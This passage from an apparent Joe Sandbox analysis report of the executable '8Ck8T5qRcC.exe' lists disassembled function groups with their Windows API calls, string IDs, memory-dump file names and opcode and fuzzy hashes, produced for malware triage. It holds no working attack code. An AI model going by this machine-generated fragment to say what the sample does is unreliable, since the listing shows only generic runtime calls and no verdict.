                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00DBA676,?,?,00DBA616,?,00DCF7B0,0000000C,00DBA76D,?,00000002,00000000), ref: 00DBA71B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 36c62e6e1b18a3bae340caa7d4625ca099e701828ccf137d3eb6d292aba865d1
                                                                    • Instruction ID: f487ff077f4d768b5eb6e4e4e6ecd0cee75c5517c873769b82760f00049fd1fc
                                                                    • Opcode Fuzzy Hash: 36c62e6e1b18a3bae340caa7d4625ca099e701828ccf137d3eb6d292aba865d1
                                                                    • Instruction Fuzzy Hash: 2CF03C30A1520AFBDB119FA4DC59FADBBB9EB08711F044169B806A22A0CB719D41DAB1
                                                                    APIs
                                                                      • Part of subcall function 00DA28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DA28D4
                                                                      • Part of subcall function 00DA28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DA1309,Crypt32.dll,00000000,00DA1383,00000200,?,00DA1366,00000000,00000000,?), ref: 00DA28F4
                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DA1315
                                                                    • GetProcAddress.KERNEL32(00DDC1F0,CryptUnprotectMemory), ref: 00DA1325
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                    • API String ID: 2141747552-1753850145
                                                                    • Opcode ID: bd8ba01629f284bd6f53d586f410a34873b3794d09ddb17fbc0be417473acd60
                                                                    • Instruction ID: 894ea370582c5a74acda2d6904491ee8b2a003facc3777e4b8170f5b942bdc5b
                                                                    • Opcode Fuzzy Hash: bd8ba01629f284bd6f53d586f410a34873b3794d09ddb17fbc0be417473acd60
                                                                    • Instruction Fuzzy Hash: 2EE08674A407039EDB215F349909F427FE59F25700F04C81DF0D6E3650D6B4D8858B30
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer$_abort
                                                                    • String ID:
                                                                    • API String ID: 2252061734-0
                                                                    • Opcode ID: 3ad7277bc24926a3da92e1d3c99d77e982488e0426912bd86396bfd2e71dcb53
                                                                    • Instruction ID: 91706d33f67966bce747ff5e59486ad0ff3f64ed1817667e493e5a074e3529c4
                                                                    • Opcode Fuzzy Hash: 3ad7277bc24926a3da92e1d3c99d77e982488e0426912bd86396bfd2e71dcb53
                                                                    • Instruction Fuzzy Hash: 0D51AE72A01A06DFDB299F54E881BEAB3A4EF44750F18452DE847873A9D771EC41CBB0
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00DBE589
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DBE5AC
                                                                      • Part of subcall function 00DBBC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DBE5D2
                                                                    • _free.LIBCMT ref: 00DBE5E5
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DBE5F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 1359642046e4e07d5846b18e7185945a794405f33baaf5d50d92f0acc720086e
                                                                    • Instruction ID: 504abccf6a05a40e543574e8948dd51016d93568c478b54b629c6046aeca43e1
                                                                    • Opcode Fuzzy Hash: 1359642046e4e07d5846b18e7185945a794405f33baaf5d50d92f0acc720086e
                                                                    • Instruction Fuzzy Hash: B7018472601716BF273196765C89CFB6BADEEC6B653680129B906D7205FF61CD0181B0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00DBBC80,00DBD7D8,?,00DBB9D3,00000001,00000364,?,00DB688D,?,?,00DD50C4), ref: 00DBBA2E
                                                                    • _free.LIBCMT ref: 00DBBA63
                                                                    • _free.LIBCMT ref: 00DBBA8A
                                                                    • SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBA97
                                                                    • SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBAA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: a03a8bc4a4e3e2ca86c517404d05e8d42ab546a22f39414f2bec5b31648b938f
                                                                    • Instruction ID: 3aea30abd75d69eb0c22857d66ebdb7ded360ec0c712dc2fa029bed6b95f4892
                                                                    • Opcode Fuzzy Hash: a03a8bc4a4e3e2ca86c517404d05e8d42ab546a22f39414f2bec5b31648b938f
                                                                    • Instruction Fuzzy Hash: C501D136A05702EB8216A7755C86DEA266EDFC17757250026F507E2291EFE1CC05A170
                                                                    APIs
                                                                      • Part of subcall function 00DA32AF: ResetEvent.KERNEL32(?), ref: 00DA32C1
                                                                      • Part of subcall function 00DA32AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00DA32D5
                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000,E7604376,?,?,00000001,?,00DC52FF,000000FF,?,00DA43C0,?,00000000,?,00D94766), ref: 00DA3007
                                                                    • CloseHandle.KERNEL32(?,?,?,00DA43C0,?,00000000,?,00D94766,?,?,?,00000000,?,?,?,00000001), ref: 00DA3021
                                                                    • DeleteCriticalSection.KERNEL32(?,?,00DA43C0,?,00000000,?,00D94766,?,?,?,00000000,?,?,?,00000001,?), ref: 00DA303A
                                                                    • CloseHandle.KERNEL32(?,?,00DA43C0,?,00000000,?,00D94766,?,?,?,00000000,?,?,?,00000001,?), ref: 00DA3046
                                                                    • CloseHandle.KERNEL32(?,?,00DA43C0,?,00000000,?,00D94766,?,?,?,00000000,?,?,?,00000001,?), ref: 00DA3052
                                                                      • Part of subcall function 00DA30CA: WaitForSingleObject.KERNEL32(?,000000FF,00DA31E7,?,?,00DA325F,?,?,?,?,?,00DA3249), ref: 00DA30D0
                                                                      • Part of subcall function 00DA30CA: GetLastError.KERNEL32(?,?,00DA325F,?,?,?,?,?,00DA3249), ref: 00DA30DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                    • String ID:
                                                                    • API String ID: 1868215902-0
                                                                    • Opcode ID: c9e065bfc9d620f2746bf5b22e7eb43264651d60ef8ba8fd6013e89cf24469ee
                                                                    • Instruction ID: 6b475ab1fcc4ca4c410e65973f10fda29dc8302f819a6756bf8b7339d9946ef7
                                                                    • Opcode Fuzzy Hash: c9e065bfc9d620f2746bf5b22e7eb43264651d60ef8ba8fd6013e89cf24469ee
                                                                    • Instruction Fuzzy Hash: 07116172500745EFC7229F64DC84FC6FBAAFB08710F00092AF166A2260CB75AA449B74
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00DBEE67
                                                                      • Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
                                                                      • Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22
                                                                    • _free.LIBCMT ref: 00DBEE79
                                                                    • _free.LIBCMT ref: 00DBEE8B
                                                                    • _free.LIBCMT ref: 00DBEE9D
                                                                    • _free.LIBCMT ref: 00DBEEAF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: d7c31b2e415fca4c522fb74fbd6926d540a2829c740f2e49c34b2bdf9bc7cc43
                                                                    • Instruction ID: 69c607d81ac9a462382217b50209eba83ba2270f098b56dc69b3b3418dc8e2b7
                                                                    • Opcode Fuzzy Hash: d7c31b2e415fca4c522fb74fbd6926d540a2829c740f2e49c34b2bdf9bc7cc43
                                                                    • Instruction Fuzzy Hash: E3F0AF72905310EFC664EB69E585CDA77EAFA10720B590806F44FD7651CBF0FC808A74
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00DBB17E
                                                                      • Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
                                                                      • Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22
                                                                    • _free.LIBCMT ref: 00DBB190
                                                                    • _free.LIBCMT ref: 00DBB1A3
                                                                    • _free.LIBCMT ref: 00DBB1B4
                                                                    • _free.LIBCMT ref: 00DBB1C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 52cb1eb675416163c249356dbfc5ddeb98316822a111bbed88b39277c93515a5
                                                                    • Instruction ID: bca05d5833e3b520f98cfdba971dc9cf3bf76e8103c7c5f70102d407791cd898
                                                                    • Opcode Fuzzy Hash: 52cb1eb675416163c249356dbfc5ddeb98316822a111bbed88b39277c93515a5
                                                                    • Instruction Fuzzy Hash: FCF0A474C11720EF8A41AB19EC014E87B75FB24735309820BF41AD6B61CBF68841CFB4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %ls$%s: %s
                                                                    • API String ID: 589789837-2259941744
                                                                    • Opcode ID: 17c5c24d34efd57466c6bd15605dbc26fe2c491b333a5ee21ccc329f8c773568
                                                                    • Instruction ID: 43652b0bf6d2d80b130f9955356a6879aad66b17d1ad32a3f1d718dae85138bf
                                                                    • Opcode Fuzzy Hash: 17c5c24d34efd57466c6bd15605dbc26fe2c491b333a5ee21ccc329f8c773568
                                                                    • Instruction Fuzzy Hash: 6A51A7B5648305FAF6211B988D43F7A7A67EB07F00F204506F3CA654D1C6A1D750AF76
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\8Ck8T5qRcC.exe,00000104), ref: 00DBA800
                                                                    • _free.LIBCMT ref: 00DBA8CB
                                                                    • _free.LIBCMT ref: 00DBA8D5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user\Desktop\8Ck8T5qRcC.exe
                                                                    • API String ID: 2506810119-188225635
                                                                    • Opcode ID: 1472d82f3c047200aea738118a1680c31a67dbf2e8ba6b0a2f4f21cef07bcf11
                                                                    • Instruction ID: 4f90b2ca69a8d6e84f421d014e1ca2600e5d8425cddb6d7c1c8b1f4e803db790
                                                                    • Opcode Fuzzy Hash: 1472d82f3c047200aea738118a1680c31a67dbf2e8ba6b0a2f4f21cef07bcf11
                                                                    • Instruction Fuzzy Hash: 2F316175A00318EFDB21DB9DD8859EEBBFCEB84710B148067E50697611D6B08E41DBB1
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00DB581B
                                                                    • _abort.LIBCMT ref: 00DB5926
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer_abort
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 948111806-2084237596
                                                                    • Opcode ID: f4bd319a36c35dd061e442fb4ad4ba09312eff896a695adfdae85c6fffd239a6
                                                                    • Instruction ID: 2d9076c7fd8804a860474293006e69d458f518ce6a78408f56f34e0147e18233
                                                                    • Opcode Fuzzy Hash: f4bd319a36c35dd061e442fb4ad4ba09312eff896a695adfdae85c6fffd239a6
                                                                    • Instruction Fuzzy Hash: 2C416636900609EFCF16CF98D881BEEBBB5EF48310F188159F916A6215D3359950DF60
                                                                    APIs
                                                                    • __fprintf_l.LIBCMT ref: 00D9F82D
                                                                    • _strncpy.LIBCMT ref: 00D9F871
                                                                      • Part of subcall function 00DA3F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00D9F801,00000000,00000000,?,00DD5070,?,00D9F801,?,?,00000050,?), ref: 00DA3F64
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                    • String ID: $%s$@%s
                                                                    • API String ID: 562999700-834177443
                                                                    • Opcode ID: 005bc7892107a3fcd1d324b5cab2fa755bb1d08330781a0ceb89af14c3e73418
                                                                    • Instruction ID: e98bcb309b904cc6e65435d6e7fbf960b6076d011573bb55f33c88d37c4d0ae6
                                                                    • Opcode Fuzzy Hash: 005bc7892107a3fcd1d324b5cab2fa755bb1d08330781a0ceb89af14c3e73418
                                                                    • Instruction Fuzzy Hash: B7214AB2900349ABDF20DFA4CD41FAE77A8FB15700F08052AF961D7191E772EA199B71
                                                                    APIs
                                                                      • Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
                                                                      • Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0
                                                                    • EndDialog.USER32(?,00000001), ref: 00DACE28
                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00DACE3D
                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00DACE52
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: ASKNEXTVOL
                                                                    • API String ID: 445417207-3402441367
                                                                    • Opcode ID: 0c48a1091b557293b9d13b04b4687ef666a73e85c0fe686cb5b43c7227ead3d1
                                                                    • Instruction ID: b82304d023ff6dd8c637c36aa50b4f844dc8df7192683d245ba2a309aba7edb9
                                                                    • Opcode Fuzzy Hash: 0c48a1091b557293b9d13b04b4687ef666a73e85c0fe686cb5b43c7227ead3d1
                                                                    • Instruction Fuzzy Hash: 5511D032650345AFDB219B68ED09F763FA9FB4BB50F044014F342EB2A4C7629A05D7B5
                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D9CAA0,00000008,00000004,00D9F1F0,?,00000000), ref: 00DA2F61
                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D9CAA0,00000008,00000004,00D9F1F0,?,00000000), ref: 00DA2F6B
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D9CAA0,00000008,00000004,00D9F1F0,?,00000000), ref: 00DA2F7B
                                                                    Strings
                                                                    • Thread pool initialization failed., xrefs: 00DA2F93
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                    • String ID: Thread pool initialization failed.
                                                                    • API String ID: 3340455307-2182114853
                                                                    • Opcode ID: 19daf5bb8b944dc4f3b7c2b7c7d29559f8a87f2c9452e1105015bf5f216efca4
                                                                    • Instruction ID: ac5efc9573de12e2b97649a7ea552874c9ac1882b2ca1c286ab4bf4bdffad7ee
                                                                    • Opcode Fuzzy Hash: 19daf5bb8b944dc4f3b7c2b7c7d29559f8a87f2c9452e1105015bf5f216efca4
                                                                    • Instruction Fuzzy Hash: E5114CB164470AAFC3215F6B9C84AA7FBECEF96744F54482EF1DAD2240D6B199408B70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
